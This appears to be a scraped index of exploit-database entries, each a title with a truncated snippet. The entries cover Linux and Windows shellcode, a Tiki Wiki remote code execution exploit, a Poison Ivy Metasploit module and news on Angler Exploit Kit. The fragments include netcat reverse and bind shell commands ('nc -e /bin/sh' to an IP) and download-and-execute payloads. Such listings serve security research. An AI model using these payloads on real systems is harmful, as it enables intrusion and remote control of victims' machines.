PInfo 0.6.9-5.1 - Local Buffer Overflow

Exploit for linux platform in category local exploits Program affected: PInfo - File viewer Version: 0.6.9-5.1 Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org Program description: An alternative info-file viewer pinfo is an viewer for Info documents, which is based on ncurse...

Linux Netcat Reverse Shell - 32bit - 77 bytes

Linux Netcat Reverse Shell - 32bit - 77 bytes. Shellcode exploit for linx86 platform include include //[email protected] //OffSec ID: OS-20614 / global start start: ;/bin//nc -e///bin/sh 10.0.0.6 99 xor eax,eax ; clear eax xor edx,edx ; clear edi ; 0xIN-LAST IN-FIRST push 0x3939393...

Windows x86 ShellExecuteANULL,NULL,"cmd.exe",NULL,NULL,1 Shellcode

Windows x86 ShellExecuteANULL,NULL,"cmd.exe",NULL,NULL,1 Shellcode. Shellcode exploit for win32 platform / Title : Windows x86 ShellExecuteANULL,NULL,"cmd.exe",NULL,NULL,1 shellcode Date : 22-06-2016 Author : Roziul Hasan Khan Shifat Tested on : Windows 7,10 x86 / / section .text global start...

Windows/x86 - ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) Shellcode (250 bytes)

/ Title : Windows x86 ShellExecuteANULL,NULL,"cmd.exe",NULL,NULL,1 shellcode Date : 22-06-2016 Author : Roziul Hasan Khan Shifat Tested on : Windows 7,10 x86 / / section .text global start start: xor ecx,ecx mov eax,fs:ecx+0x30 ;EAX=PEB mov eax,eax+0xc ;EAX=PEB-Ldr mov esi,eax+0x14...

lisa.py - An Exploit Dev Swiss Army Knife

lisa.py An Exploit Dev Swiss Army Knife. Installation Copy lisa.py and .lldbinit to / Use the following commands: ant4g0nist$ cp lisa.py /lisa.py ant4g0nist$ cp lldbinit /.lldbinit ant4g0nist$ lldb lllllll iiii l:::::l i::::i l:::::l iiii l:::::l l::::l iiiiiii ssssssssss aaaaaaaaaaaaa l::::l...

Linux x86_64 execve Shellcode - 15 bytes

Linux x8664 execve Shellcode - 15 bytes. Shellcode exploit for linx86-64 platform include include // OS-20614 // [email protected] / global start start: execve: mov rsi, rax mov rdx, rsi mov r12 , 0x68732f6e69622f push r12 push rsp pop rdi mov al, 0x3b syscall / unsigned char code ...

Windows/XP < 10 - Download & Execute Shellcode

/ + Author : B3mB4m Contact : email protected Project : https://github.com/b3mb4m/shellsploit-framework Greetz : Bomberman,T-Rex,Pixi ----------------------------------------------------------- Tested on : Windows XP/SP3 x86 Windows 7 Ultimate x64 Windows 8.1 Pro Build 9600 x64 Windows 10 Home x6...

Windows XP - 10 - Download & Execute Shellcode

Windows XP - 10 - Download & Execute Shellcode. Shellcode exploit for windows platform / + Author : B3mB4m Contact : [email protected] Project : https://github.com/b3mb4m/shellsploit-framework Greetz : Bomberman,T-Rex,Pixi ----------------------------------------------------------- Tested on ...

Tiki Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution

Exploit for php platform in category web applications Exploit Title: Tiki-Calendar-RCE Google Dork: inurl:tiki-calendar.php Date: 2015-12-16 Exploit Author: Dany Ouellet Vendor Homepage: https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki Software Link:...

Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution

Exploit Title: Tiki-Calendar-RCE Google Dork: inurl:tiki-calendar.php Date: 2015-12-16 Exploit Author: Dany Ouellet Vendor Homepage: https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki Software Link: https://tiki.org/Download Version: ALL supported versions of Tiki 14.2,...

Windows x86 system"systeminfo" Shellcode

Windows x86 system"systeminfo" Shellcode. Shellcode exploit for win32 platform / Title : Windows x86 system"systeminfo" shellcode Date : 10-06-2016 Author : Roziul Hasan Khan Shifat Tested on : Windows 7 Professional x86 / / section .text global start start: xor ecx,ecx mov eax,fs:ecx+0x30 ;EAX=P...

Windows/x86 - system("systeminfo") Shellcode (224 bytes)

/ Title : Windows x86 system"systeminfo" shellcode Date : 10-06-2016 Author : Roziul Hasan Khan Shifat Tested on : Windows 7 Professional x86 / / section .text global start start: xor ecx,ecx mov eax,fs:ecx+0x30 ;EAX=PEB mov eax,eax+0xc ;EAX=PEB-Ldr mov esi,eax+0x14...

Poison Ivy 2.1.x - C2 Buffer Overflow (Metasploit)

Exploit for windows platform in category remote exploits This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Poison Ivy 2.1.x C2 Buffer Overflow', 'Description' = %q This module...

Linux/x86 - /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)

/ Linux x86 /bin/nc -le /bin/sh -vp13337 shellcode56bytes Author: Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 56 SLAE - 750 Disassembly of section .text: 08048060 : 8048060: 31 c0 xor eax,eax 8048062: 50 push eax 8048063: 68 33 33 33 37 push 0x37333333 8048068: 68 2d 76 70 31 push...

Windows/x86 - WinExec("cmd.exe",0) Shellcode (184 bytes)

/ Title : Windows x86 WinExec"cmd.exe",0 shellcode Date : 07/06/2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x86 / / To Compile: -------------- $nasm -f win32 winexec.asm -o exec.obj Linking: ---------- $ "C:\Program Files\CodeBlocks\MinGW\bin\ld.exe" -o winexec.exe...

Windows x86 WinExec"cmd.exe",0 Shellcode

Windows x86 WinExec"cmd.exe",0 Shellcode. Shellcode exploit for win32 platform / Title : Windows x86 WinExec"cmd.exe",0 shellcode Date : 07/06/2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x86 / / To Compile: -------------- $nasm -f win32 winexec.asm -o exec.obj Linkin...

Linux x86 /bin/nc -le /bin/sh -vp13337 Shellcode 56 bytes

Linux x86 /bin/nc -le /bin/sh -vp13337 Shellcode 56 bytes. Shellcode exploit for linx86 platform / Linux x86 /bin/nc -le /bin/sh -vp13337 shellcode56bytes Author: Author: sajith Tested on: i686 GNU/Linux Shellcode Length: 56 SLAE - 750 Disassembly of section .text: 08048060 : 8048060: 31 c0 xor...

New Angler Exploits Bypass EMET Mitigations

New Microsoft Silverlight and Adobe Flash exploits that bypass Microsoft’s Enhanced Mitigation Experience Toolkit EMET have found their way into an updated version of the Angler Exploit Kit. EMET is a suite of freely available tools for Windows machines that mitigate memory-based attacks. The...

Angler Exploit Kit Evading EMET

We recently encountered some exploits from Angler Exploit Kit EK that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit EMET. This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7. Angler EK uses complex...

Linux/Windows/BSD x86_64 - execve("/bin//sh", {"//bin/sh", "-c",

/ Title : Execute command on Linux/Windows/BSD x8664 execve"/bin//sh", "//bin/sh", "-c", "cmd", NULL shellcode Date : 04-06-2016 Author : @odzhancode Tested On : Debian x86/x64, FreeBSD x64, OpenBSD x64, Windows x86, Windows x64 / ; ; exec.asm ; ; Execute a command ; Works on 32/64-bit versions o...